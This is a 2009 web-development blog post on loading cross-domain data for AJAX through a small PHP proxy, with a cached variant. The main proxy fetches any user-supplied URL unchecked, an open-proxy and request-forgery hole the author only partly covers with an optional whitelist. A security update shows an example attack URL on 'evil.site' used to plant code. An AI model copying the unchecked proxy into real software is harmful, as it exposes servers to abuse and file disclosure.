
Performing AJAX request on an external domain

May 9, 2009
By now everyone should be well aware of the basics behind AJAX. You create a page, forget to add all the information the user actually wants, and decide to put a resource-hogging piece of JavaScript in there to load data when the page is already on the screen - or to send data back to the server instead of using an old-fashioned POST request.

So far so good - there are situations where AJAX really does improve the user experience, and most techniques invariably boil down to creating an XMLHttpRequest object, setting an onreadystatechange handler, opening a URL and sending the request:
Code (javascript) (new window):
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = handler;
xmlhttp.open("GET", url, true);
xmlhttp.send(null);

Now this is all well and good, except that the second line hides one crippling limitation: you cannot open a URL on an external domain! There is of course a damn good reason for this: if you could, the owner of the external domain could, for example, easily read out session information, redirect the user, or alter the page in small but significant ways. Executing script in the context of another site is exactly what cross-site scripting (XSS) attacks are about, and the same-origin policy exists to prevent it.

Luckily there are alternatives, like SOAP, designed to handle the nasty security issues of external data loading in what should be a relatively secure environment. Unfortunately, this only works if the server you are loading data from offers that functionality - and some popular webservices do not.

However, if you trust these services enough, there is another option: use a simple, two-line proxy script to relay external data requests.
Code (php) (new window):
header('Content-type: application/xml');
echo file_get_contents($_GET['page']);

To increase the complexity somewhat, we can also store previous requests in files, significantly speeding up the whole process:
Code (php) (new window):
header('Content-type: application/xml');
$fileId = 'xmlcache/ajax/' . sha1($_GET['page']);

if (file_exists($fileId)) {
  $file = file_get_contents($fileId);
} else {
  $file = file_get_contents($_GET['page']);
  file_put_contents($fileId, $file);
}

echo $file;

Optionally, if the data updates only every day or so, you could add a check on the cache file's modification time and only use the cached version if it is not too old - but that should be a trivial modification for anyone who has come this far :]
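For completeness, such an expiry check could look something like this - a sketch only; the fetchCached() helper and the one-hour lifetime are my own choices, not part of the original script:

```php
<?php
// Sketch of the caching proxy with an expiry check. The function name
// and the default one-hour lifetime are assumptions for illustration.
function fetchCached($page, $maxAge = 3600)
{
    $fileId = 'xmlcache/ajax/' . sha1($page);

    // Serve the cached copy only while it is younger than $maxAge seconds
    if (file_exists($fileId) && (time() - filemtime($fileId)) < $maxAge) {
        return file_get_contents($fileId);
    }

    // Otherwise fetch a fresh copy and overwrite the cache file
    $file = file_get_contents($page);
    file_put_contents($fileId, $file);
    return $file;
}

// In the proxy script itself you would then do:
//   header('Content-type: application/xml');
//   echo fetchCached($_GET['page']);
```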

Note also that you will most likely want to secure this script so people cannot use it as a free open proxy - because that is in fact what we are creating here: a simple XML proxy server that lets you load XML data from another domain into your AJAX'ed-up website. Its use is quite limited, yet these days it seems that whenever a possibility to exploit something is left open, it is taken advantage of.
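One straightforward way to lock the proxy down is to only relay requests for hosts you explicitly trust. A sketch, assuming a hypothetical isAllowed() helper and made-up host names:

```php
<?php
// Whitelist sketch: only explicitly trusted hosts may be proxied.
// isAllowed() and the host names below are illustrative assumptions.
function isAllowed($url, array $allowedHosts)
{
    $host = parse_url($url, PHP_URL_HOST);
    return in_array($host, $allowedHosts, true);
}

// In the proxy script:
//   $allowedHosts = array('api.example.com', 'feeds.example.org');
//   if (!isAllowed($_GET['page'], $allowedHosts)) {
//       header('HTTP/1.1 403 Forbidden');
//       exit;
//   }
//   header('Content-type: application/xml');
//   echo file_get_contents($_GET['page']);
```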

There are a few things to keep in mind when loading external data in your pages:
1. you are bypassing an important security feature of most modern browsers - a feature that is in place for a damn good reason. Know that reason.
2. If you do not need to load the data asynchronously, you might as well preload it using server-side scripts. The data has to pass between your webserver and the external server anyway, so if you can do a bit of parsing on the server side, it can speed up the process on the client side (less data to be sent around, for one).

On the other hand, if the amount of parsing that needs doing is extensive and your webserver is under heavy load, letting your clients handle most of it could actually be quite beneficial. It can significantly decrease initial load times, as well as CPU load on the webserver. If caching is employed, you could even decrease server-to-server transfers, although with XML data this should never be an issue.

Update: Security Consideration
Something worth noting: when using a proxy that employs caching, make sure you either do not allow direct access to the cached file location, or at the very least turn the executable bit off and rename all incoming files, as is done in the example (the sha1() hash strips the original file name and extension). Fail to do so, and someone might just call your proxy with ?page=http://evil.site/script.php and in that way store - and later execute - any code they want on your server.

FragFrog out!

May 20, 2009 Dimitry

Thanks, very nice solution! Just what I was looking for..
